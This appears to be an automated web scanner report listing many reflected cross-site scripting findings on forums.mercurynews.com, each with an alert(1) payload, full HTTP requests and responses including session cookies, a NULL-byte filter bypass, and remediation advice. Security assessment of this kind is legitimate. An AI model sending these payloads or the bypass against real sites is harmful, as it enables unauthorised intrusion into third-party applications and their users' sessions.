HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:39 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:03 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cac3"-alert(1)-"ff2a2ccfa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums8cac3"-alert(1)-"ff2a2ccfa6/forum/673 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=7cf2c41678eb464964f8a0ac1163697f; expires=Wed, 08 Dec 2010 02:46:18 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:13:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22034
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f1250"-alert(1)-"6cf71db7b96 was submitted in the REST URL parameter 2. This input was echoed as f1250"-alert(1)-"6cf71db7b96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum%00f1250"-alert(1)-"6cf71db7b96/673 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:13:32 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ec6a4cd6b8b79036be9cc2544a3b80f1; expires=Wed, 08 Dec 2010 02:46:52 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:13:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21992
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00827f3"-alert(1)-"682449f4fa5 was submitted in the REST URL parameter 3. This input was echoed as 827f3"-alert(1)-"682449f4fa5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/673%00827f3"-alert(1)-"682449f4fa5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:13:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=96d5ff16ceb4d4857e2b1a534cbdbe8f; expires=Wed, 08 Dec 2010 02:47:18 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:14:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21992
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55459"-alert(1)-"f8751e5772f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0035e64"-alert(1)-"1c84bda8999 was submitted in the REST URL parameter 2. This input was echoed as 35e64"-alert(1)-"1c84bda8999 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0054fb5"-alert(1)-"d8ab2187b4c was submitted in the REST URL parameter 3. This input was echoed as 54fb5"-alert(1)-"d8ab2187b4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0031fdf"-alert(1)-"ae07d35c128 was submitted in the REST URL parameter 4. This input was echoed as 31fdf"-alert(1)-"ae07d35c128 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7fea7<script>alert(1)</script>441aed72aaa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the js_param1 request parameter is copied into the HTML document as plain text between tags. The payload 4134b<script>alert(1)</script>ea3b7054a28 was submitted in the js_param1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fc6"-alert(1)-"9628637350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsd7fc6"-alert(1)-"9628637350/poll HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:05 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=d014b033f451192e0b481c31c0f9c21f; expires=Wed, 08 Dec 2010 02:45:25 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22022
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00cc000"-alert(1)-"9c127b33533 was submitted in the REST URL parameter 2. This input was echoed as cc000"-alert(1)-"9c127b33533 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/poll%00cc000"-alert(1)-"9c127b33533 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:30 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ba286c7c4afb5835084961bfc4371e7b; expires=Wed, 08 Dec 2010 02:45:50 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21987
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae6d"-alert(1)-"6579eb870fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0038e10"-alert(1)-"50952c2689f was submitted in the REST URL parameter 2. This input was echoed as 38e10"-alert(1)-"50952c2689f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00db1dc"-alert(1)-"884372cd347 was submitted in the REST URL parameter 3. This input was echoed as db1dc"-alert(1)-"884372cd347 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea44e"-alert(1)-"b9cbcd4d1f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrssea44e"-alert(1)-"b9cbcd4d1f1/forum/602/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22114
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861fb"-alert(1)-"f033e721dd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrss/forum861fb"-alert(1)-"f033e721dd3/602/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22114
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcc9"-alert(1)-"c5da668924b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrss/forum/602abcc9"-alert(1)-"c5da668924b/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22117
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ddeb"-alert(1)-"d654b8caae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll6ddeb"-alert(1)-"d654b8caae1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:52 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22084
3.82. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/poll
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 617c4"-alert(1)-"5f42983c31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll?617c4"-alert(1)-"5f42983c31b=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:42 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19326
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 266bd"-alert(1)-"bf4e6a9d30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll266bd"-alert(1)-"bf4e6a9d30d/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:59 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22216
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f844"-alert(1)-"3df5df2d371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county2f844"-alert(1)-"3df5df2d371 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:03 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20220
3.85. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bf3"-alert(1)-"01dc7af58ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county?b1bf3"-alert(1)-"01dc7af58ce=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:54 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28628
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72dff"-alert(1)-"3eb0ed22cc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61ea"-alert(1)-"f6fde09b897 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab22e"-alert(1)-"d193185f86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:08 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose"; s.prop9=getCiQueryString("SOURCE"); s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF"); s. ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f6eb"-alert(1)-"db61396b3da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
